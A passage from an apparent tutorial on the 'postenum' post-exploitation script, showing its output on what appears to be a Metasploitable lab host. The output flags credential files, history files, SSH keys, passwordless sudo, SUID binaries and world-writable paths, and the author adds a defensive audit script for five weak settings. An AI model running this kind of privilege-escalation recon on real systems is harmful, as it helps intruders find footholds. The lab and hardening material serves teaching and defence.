-rw-r--r-- 1 root root 354 Mar  5  2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20  2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20  2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar  8  2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 41 Jul  5  2018 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18  2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28  2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16  2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27  2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28  2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23  2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21  2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec  2  2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23  2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16  2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May  4  2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20  2012 /etc/xinetd.conf

[x] Sudo permissions
[/] We can run sudo without supplying a password:
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
            {-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...

[+] - Check sensitive files
-rw-r--r-- 1 root root 1581 May 13  2012 /etc/passwd
-rw-r----- 1 root shadow 1207 May 13  2012 /etc/shadow
-rw-r--r-- 1 root root 886 Apr 16  2010 /etc/group
-r--r----- 1 root root 470 Mar 16  2010 /etc/sudoers

[+] - Check if anything interesting in the mail directory
[x] Interesting mail in /var/mail:
-rw------- 1 msfadmin mail   0 Apr 28  2010 msfadmin
-rw------- 1 root     mail 722 May  7  2010 root

[x] Seems /var/mail/root exist - you can try to read it:
./postenum.sh: line 792: : command not found

[+] - Check if anything interesting in the home/root directories
[x] Check if /root is accessible:
[/] Root directory can be accessible
drwxr-xr-x 2 root root 4.0K May 20  2012 Desktop
-rwx------ 1 root root  401 May 20  2012 reset_logs.sh
-rw-r--r-- 1 root root  138 Jun 19 13:21 vnc.log

[x] Interesting /home/* directory:
drwxr-xr-x 2 root     nogroup  4.0K Mar 17  2010 ftp
drwxr-xr-x 5 msfadmin msfadmin 4.0K Jun  6  2018 msfadmin
drwxr-xr-x 2 service  service  4.0K Apr 16  2010 service
drwxr-xr-x 3 user     user     4.0K May  7  2010 user

[x] History files of /home/*/:
lrwxrwxrwx 1 root root 9 May 14  2012 /home/msfadmin/.bash_history -> /dev/null
-rw------- 1 root root 4.1K May 14  2012 /home/msfadmin/.mysql_history
-rw------- 1 user user 165 May  7  2010 /home/user/.bash_history

[x] History files of /root:
-rw-r--r-- 1 root root 173 Jun 18  2020 /root/.bash_history
-rw------- 1 root root 215 Jun 18 13:46 /root/.mysql_history

[+] - Check for plain text password
[x] ~/.bash_history - snippet below:
export TERM=xterm-256color
export SHELL=bash
stty rows 56 columns 213
ls
export TERM=xterm
ls
gfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ls
ls -la
cd /tmp/

~/.nano_history file doesn't exist:
~/.mysql_history file doesn't exist
~/.php_history file doesn't exist

[+] - Check SSH Dir/Files
[x] Any private-key info - /home/*/.ssh/:
drwx------ 2 msfadmin msfadmin 4096 May 17  2010 /home/msfadmin/.ssh

drwx------ 2 user user 4096 May  7  2010 /home/user/.ssh

[x] Any private-key info - /root/.ssh/:
drwxr-xr-x 2 root root 4096 May 20  2012 /root/.ssh/
ls: cannot open directory /home/user/.ssh: Permission denied
 [READABLE]

Check if PermitRootLogin is on:
[/] Root is allowed to login via SSH
yes

[+] - Check password policy information and Umask value
[x] Password Policy:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7

[x] Current umask value:
0022
u=rwx,g=rx,o=rx

[+] - Accessible .rhosts files
[x] Rhost config file(s):
-rwx------ 1 msfadmin msfadmin 4 May 20  2012 /home/msfadmin/.rhosts

First, it provides a list of superusers and users, followed by anything from /etc/passwd that has a shell. Next, it looks for various config files, sensitive files, and what the sudo permissions are. Then it checks mail and any other interesting files in the root and home directories. Finally, it gives us the Bash history, password policy information, and any private keys for SSH.
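
Read as a hardening checklist, the -c output above surfaces five settings a compliance scan should fail on: PermitRootLogin yes, a PASS_MAX_DAYS of 99999 (passwords never expire), sudo usable without a password, .rhosts files in home directories, and a /root that other users can list. The script below is an added example, not postenum code: it expresses those five as explicit tests over config files under a root prefix, so they can run from a scheduled job rather than be read off tool output. Both fixtures are constructed here, not copied from the target; the WEAK fixture mirrors the state shown above and the HARD fixture is the corrected state, so the audit can be seen to distinguish them.

```shell
#!/bin/sh
# Added example, not part of postenum: the -c output above surfaces five
# settings a hardening scan should fail on (PermitRootLogin yes, a 99999-day
# PASS_MAX_DAYS, passwordless sudo, .rhosts files, a world-readable /root).
# This script expresses them as explicit tests over config files under a
# root prefix. Both fixtures below are constructed, not copied from the
# target: WEAK mirrors the state shown above, HARD is the corrected state.
WEAK=$(mktemp -d)
HARD=$(mktemp -d)
trap 'rm -rf "$WEAK" "$HARD"' EXIT

# build_fixture <prefix> <PermitRootLogin> <PASS_MAX_DAYS> <sudo-tag> <root-mode> <rhosts yes|no>
build_fixture() {
  mkdir -p "$1/etc/ssh" "$1/root" "$1/home/msfadmin"
  printf '# constructed sshd_config\nPort 22\nPermitRootLogin %s\n' "$2" > "$1/etc/ssh/sshd_config"
  printf 'PASS_MAX_DAYS   %s\nPASS_MIN_DAYS   0\nPASS_WARN_AGE   7\n' "$3" > "$1/etc/login.defs"
  printf 'root ALL=(ALL) ALL\nmsfadmin ALL=(ALL) %s ALL\n' "$4" > "$1/etc/sudoers"
  chmod "$5" "$1/root"
  [ "$6" = yes ] && : > "$1/home/msfadmin/.rhosts"
  return 0
}
build_fixture "$WEAK" yes 99999 'NOPASSWD:' 755 yes
build_fixture "$HARD" no 90 '' 700 no

# sshd_setting <file> <key>: effective value; sshd uses the first match.
sshd_setting() {
  awk -v k="$2" 'tolower($1) == tolower(k) { print $2; exit }' "$1"
}

# audit_host <prefix>: print one finding per line (nothing when clean).
audit_host() {
  base=$1
  v=$(sshd_setting "$base/etc/ssh/sshd_config" PermitRootLogin)
  case "$v" in
    no|prohibit-password|without-password) ;;
    *) echo "sshd: PermitRootLogin is '${v:-not set}' (want no or prohibit-password)" ;;
  esac
  maxd=$(awk '$1 == "PASS_MAX_DAYS" { print $2 }' "$base/etc/login.defs")
  if [ -z "$maxd" ] || [ "$maxd" -gt 365 ]; then
    echo "login.defs: PASS_MAX_DAYS is ${maxd:-not set} (passwords never expire)"
  fi
  if grep -E -q '^[^#].*NOPASSWD' "$base/etc/sudoers"; then
    echo "sudoers: passwordless rule: $(grep -E '^[^#].*NOPASSWD' "$base/etc/sudoers")"
  fi
  for f in "$base"/home/*/.rhosts "$base"/root/.rhosts; do
    [ -e "$f" ] && echo "rhosts: ${f#"$base"} present (rsh trust file)"
  done
  if [ -n "$(find "$base/root" -maxdepth 0 -perm -004)" ]; then
    echo "root home: /root is world-readable (want mode 700)"
  fi
  return 0
}

# finding_count <prefix>: number of findings, for use as a pass/fail gate.
finding_count() {
  audit_host "$1" | wc -l | tr -d ' '
}

echo "weak fixture:";  audit_host "$WEAK"
echo "hardened fixture: $(finding_count "$HARD") findings"
```

Pointing audit_host at / runs the same tests against the live system; the sudoers test reads only the main file, so include /etc/sudoers.d in a real deployment, and the sshd test follows sshd's first-match rule rather than the last line of the file.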

Stage 8: Other Files & Sticky Bits

The next option we will cover provides SUID and SGID information about the file system. These kinds of files can often be abused for privilege escalation when they are misconfigured. It will also check for hidden files and any other useful bits of information – use the -s switch for this:

target:/var/tmp$ ./postenum.sh -s

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] FILE SYSTEM
[+] - Check if anything interesting in the www directory
[x] Any interesting file/folder in /var:
drwxr-xr-x  2 root     root     4.0K May  8  2010 backups
drwxr-xr-x 12 root     root     4.0K Apr 28  2010 cache
drwxr-xr-x 37 root     root     4.0K May 20  2012 lib
drwxrwsr-x  2 root     staff    4.0K Apr 15  2008 local
drwxrwxrwt  3 root     root       60 Jun 19 13:21 lock
drwxr-xr-x 14 root     root     4.0K Jun 19 13:21 log
drwxrwsr-x  2 root     mail     4.0K May  7  2010 mail
drwxr-xr-x  2 root     root     4.0K Mar 16  2010 opt
drwxr-xr-x 14 root     root      580 Jun 19 13:21 run
drwxr-xr-x  5 root     root     4.0K Apr 28  2010 spool
drwxrwxrwt  2 root     root     4.0K Jun 19 13:35 tmp
drwxr-xr-x 10 www-data www-data 4.0K Aug  8  2018 www

[x] Any interesting file/folder in /var/www:
drwxrwxrwt  3 root     root     4.0K Jun 19  2019 dav
drwxr-xr-x  8 www-data www-data 4.0K May 20  2012 dvwa
-rw-r--r--  1 www-data www-data  891 May 20  2012 index.php
drwxr-xr-x 10 www-data www-data 4.0K May 14  2012 mutillidae
drwxr-xr-x 11 www-data www-data 4.0K May 14  2012 phpMyAdmin
-rw-r--r--  1 www-data www-data   19 Apr 16  2010 phpinfo.php
drwxr-xr-x  3 www-data www-data 4.0K May 14  2012 test
drwxrwxr-x 22 www-data www-data  20K Apr 12  2018 tikiwiki
drwxrwxr-x 22 www-data www-data  20K Apr 16  2010 tikiwiki-old
drwxr-xr-x  7 www-data www-data 4.0K Apr 16  2010 twiki

ls: cannot access /var/www/html: No such file or directory

[x] Search on config.* and db.* files on /var:
-rw-r--r-- 1 root root 21424 May 20  2012 /var/cache/debconf/config.dat
-rw-r--r-- 1 root root 21308 May 20  2012 /var/cache/debconf/config.dat-old
-rw-r--r-- 1 www-data www-data 18684 Mar 16  2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 2772 Mar 16  2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/Config/Config.ini
-rw-r--r-- 1 www-data www-data 576 May 20  2012 /var/www/dvwa/config/config.inc.php
-rw-r--r-- 1 www-data www-data 576 Aug 26  2010 /var/www/dvwa/config/config.inc.php~
-rwxr-xr-x 1 www-data www-data 175 Apr  4  2018 /var/www/mutillidae/config.inc
-rwxr-xr-x 1 www-data www-data 20810 Apr 11  2011 /var/www/mutillidae/owasp-esapi-php/lib/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 60881 Dec  9  2008 /var/www/phpMyAdmin/libraries/config.default.php
-rw-r--r-- 1 www-data www-data 4066 Dec  9  2008 /var/www/phpMyAdmin/libraries/auth/config.auth.lib.php
-rw-r--r-- 1 www-data www-data 35105 Dec  9  2008 /var/www/phpMyAdmin/libraries/Config.class.php
-rw-r--r-- 1 www-data www-data 2093 Dec  9  2008 /var/www/phpMyAdmin/config.sample.inc.php
-rw-r--r-- 1 www-data www-data 1584 Dec  9  2008 /var/www/phpMyAdmin/setup/frames/config.inc.php
-rw-r--r-- 1 www-data www-data 2719 Dec  9  2008 /var/www/phpMyAdmin/setup/config.php
-rw-rw-r-- 1 www-data www-data 1770 Aug 26  2004 /var/www/tikiwiki-old/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3449 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12  2005 /var/www/tikiwiki-old/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12  2005 /var/www/tikiwiki-old/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24  2003 /var/www/tikiwiki-old/img/icons/config.gif
-rw-rw-r-- 1 www-data www-data 1770 Aug 26  2004 /var/www/tikiwiki/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 28  2006 /var/www/tikiwiki/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 30  2006 /var/www/tikiwiki/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3259 Jan 28  2004 /var/www/tikiwiki/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12  2005 /var/www/tikiwiki/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12  2005 /var/www/tikiwiki/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24  2003 /var/www/tikiwiki/img/icons/config.gif

[+] - Search for hidden files
[x] Hidden files:
-rw-r--r-- 1 service service 586 Apr 16  2010 /home/service/.profile
-rw-r--r-- 1 service service 2928 Apr 16  2010 /home/service/.bashrc
-rw-r--r-- 1 service service 220 Apr 16  2010 /home/service/.bash_logout
-rw-r--r-- 1 user user 586 Mar 31  2010 /home/user/.profile
-rw------- 1 user user 165 May  7  2010 /home/user/.bash_history
-rw-r--r-- 1 user user 2928 Mar 31  2010 /home/user/.bashrc
-rw-r--r-- 1 user user 220 Mar 31  2010 /home/user/.bash_logout
-rw------- 1 root root 4174 May 14  2012 /home/msfadmin/.mysql_history
-rw-r--r-- 1 msfadmin msfadmin 1598 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/.htaccess.txt
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 1436 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.changes
-rw-r--r-- 1 msfadmin msfadmin 210 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/.htpasswd
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3657 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3489 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 4189 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 683 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 767 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.changes
-rwx------ 1 msfadmin msfadmin 4 May 20  2012 /home/msfadmin/.rhosts
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16  2010 /home/msfadmin/.profile
-rw-r--r-- 1 msfadmin msfadmin 0 May  7  2010 /home/msfadmin/.sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 0 Jun  6  2018 /home/msfadmin/.Xauthority
-rw-rw-rw- 1 root daemon 1 Aug  8  2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
-rw-rw-rw- 1 root daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
-rw-r--r-- 1 root root 5 Dec  5  2007 /usr/share/python-support/antlr/.version
-rw-r--r-- 1 root root 2 Aug 29  2007 /usr/share/python-support/python-gnupginterface/.version
-rw-r--r-- 1 root root 0 May 20  2012 /usr/lib/firefox-3.6.17/.autoreg
-rw-r--r-- 1 root root 1258 Mar 10  2008 /usr/lib/jvm/.java-gcj.jinfo
-rw------- 1 root root 215 Jun 19 13:46 /root/.mysql_history
-rwx------ 1 root root 4 May 20  2012 /root/.rhosts
-rw-r--r-- 1 root root 141 Oct 20  2007 /root/.profile
-rw-r--r-- 1 root root 173 Jun 19  2019 /root/.bash_history
-rw------- 1 root root 324 Jun 19 13:21 /root/.Xauthority
-rw-r--r-- 1 root root 2227 Oct 20  2007 /root/.bashrc
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.monthly/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 586 Apr 14  2008 /etc/skel/.profile
-rw-r--r-- 1 root root 2928 Apr 14  2008 /etc/skel/.bashrc
-rw-r--r-- 1 root root 220 Apr 14  2008 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.daily/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.hourly/.placeholder
-rw------- 1 root root 0 Mar 16  2010 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 Jun 19 13:20 /dev/.initramfs-tools
-rw------- 1 postgres postgres 34 Jun 19 13:21 /var/run/postgresql/.s.PGSQL.5432.lock
-rw-r--r-- 1 root root 34 May 13  2012 /var/lib/python-support/python2.5/.path
-rw------- 1 postgres postgres 131 Mar 30  2010 /var/lib/postgresql/.bash_history
-rwxr-xr-x 1 www-data www-data 497 Sep  8  2010 /var/www/dvwa/.htaccess
-rwxr-xr-x 1 www-data www-data 174 Apr 11  2011 /var/www/mutillidae/.buildpath
-rwxr-xr-x 1 www-data www-data 712 Apr 11  2011 /var/www/mutillidae/.project
-rwxr-xr-x 1 www-data www-data 427 May 14  2012 /var/www/mutillidae/.htaccess
-rw-r--r-- 1 www-data www-data 118 Dec  9  2008 /var/www/phpMyAdmin/libraries/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 22  2005 /var/www/tikiwiki-old/modules/cache/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 19  2005 /var/www/tikiwiki-old/templates_c/.htaccess
-rw-r--r-- 1 www-data www-data 1598 Jun  1  2002 /var/www/twiki/bin/.htaccess.txt
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Sandbox/.mailnotify
-rwxrwxrwx 1 www-data www-data 1436 Feb  1  2003 /var/www/twiki/data/Sandbox/.changes
-rw-r--r-- 1 www-data www-data 210 Jan 11  2003 /var/www/twiki/data/.htpasswd
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Main/.mailnotify
-rwxrwxrwx 1 www-data www-data 3653 Apr 16  2010 /var/www/twiki/data/Main/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Know/.mailnotify
-rwxrwxrwx 1 www-data www-data 3489 Jan 30  2003 /var/www/twiki/data/Know/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/TWiki/.mailnotify
-rwxrwxrwx 1 www-data www-data 4189 Feb  1  2003 /var/www/twiki/data/TWiki/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/_default/.mailnotify
-rwxrwxrwx 1 www-data www-data 683 Jan 30  2003 /var/www/twiki/data/_default/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Trash/.mailnotify
-rwxrwxrwx 1 www-data www-data 767 Jan 25  2003 /var/www/twiki/data/Trash/.changes
-rw------- 1 www-data www-data 4275 Jun 19  2019 /var/www/.bash_history
-rw-rw-r-- 1 www-data www-data 66 Jan 22  2005 /var/www/tikiwiki/modules/cache/.htaccess
-rw-rw-r-- 1 www-data www-data 66 Jan 19  2005 /var/www/tikiwiki/templates_c/.htaccess
-r--r--r-- 1 root root 11 Jun 19 13:21 /tmp/.X0-lock

[+] - Check for clear-text password on /home/*
[x] Clear text password:
-rwxr-xr-x 1 msfadmin msfadmin 6936 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/passwd

[+] - The most interesting ssh files /
[x] SSH files:
-rw-r--r-- 1 root root 442 May 20  2012 /root/.ssh/known_hosts
-rw-r--r-- 1 root root 405 May 17  2010 /root/.ssh/authorized_keys

[+] - Check sticky bits, SUID and SGID
[x] SUID - 4000:
-rwsr-xr-x 1 root root 63584 Apr 14  2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26  2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14  2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10  2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10  2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec  2  2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22  2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr  2  2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10  2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22  2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10  2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr  2  2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr  2  2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr  2  2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22  2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr  2  2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct  4  2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17  2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar  9  2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov  5  2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr  6  2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17  2009 /usr/lib/pt_chown

[x] SGID - 2000:
-rwxr-sr-x 1 root shadow 19584 Apr  9  2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22  2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12  2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr  6  2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar  8  2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr  8  2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr  2  2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23  2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr  2  2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan  2  2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14  2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18  2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18  2008 /usr/sbin/postdrop

[x] Sticky bit for folders - 1000:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxr-t 2 root postgres 4096 May  8  2010 /var/log/postgresql
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19  2019 /var/www/dav
drwxrwx--T 2 daemon daemon 4096 Mar 16  2010 /var/spool/cron/atjobs
drwxrwx--T 2 daemon daemon 4096 Feb 20  2007 /var/spool/cron/atspool
drwx-wx--T 2 root crontab 4096 Apr  8  2008 /var/spool/cron/crontabs
drwx-wx--T 2 postfix postdrop 4096 May  7  2010 /var/spool/postfix/maildrop
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix

[+] - Check for written and executable places
[x] World-writable folders - 222:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19  2019 /var/www/dav
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/data/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr 16  2010 /var/www/twiki/data/Main
drwxrwxrwx 2 www-data www-data 4096 Jan 30  2003 /var/www/twiki/data/Know
drwxrwxrwx 2 www-data www-data 16384 Feb  1  2003 /var/www/twiki/data/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 30  2003 /var/www/twiki/data/_default
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/data/Trash
drwxrwxrwx 2 www-data www-data 4096 Apr 21  2002 /var/www/twiki/pub/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr  7  2002 /var/www/twiki/pub/Main
drwxrwxrwx 3 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/Know
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
drwxrwxrwx 8 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 21  2003 /var/www/twiki/pub/TWiki/TWikiDocGraphics
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/TWikiTemplates
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/TWikiLogos
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/PreviewBackground
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/FileAttachment
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/WabiSabi
drwxrwxrwx 2 www-data www-data 4096 Dec  4  2001 /var/www/twiki/pub/Trash
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/pub/icn
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix

[x] World-writable files - 0002:
304795    4 -rw-rw-rw-   1 root     daemon          1 Aug  8  2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
304796    4 -rw-rw-rw-   1 root     daemon          1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
 11265    0 srw-rw-rw-   1 root     root            0 Jun 19 13:21 /dev/log
 10037    0 drwxrwxrwt   2 root     root           40 Jun 19 13:21 /dev/shm
  6130    0 crw-rw-rw-   1 root     root              Mar 16  2010 /dev/null
  5082    0 crw-rw-rw-   1 root     tty               Jun 19 13:20 /dev/ttyzf

...

[+] - Check for readable logfiles owned by root
[x] World-readable logfiles - 0004:
-rw-r--r-- 1 root root 88953 Jul  5  2018 /var/log/dpkg.log
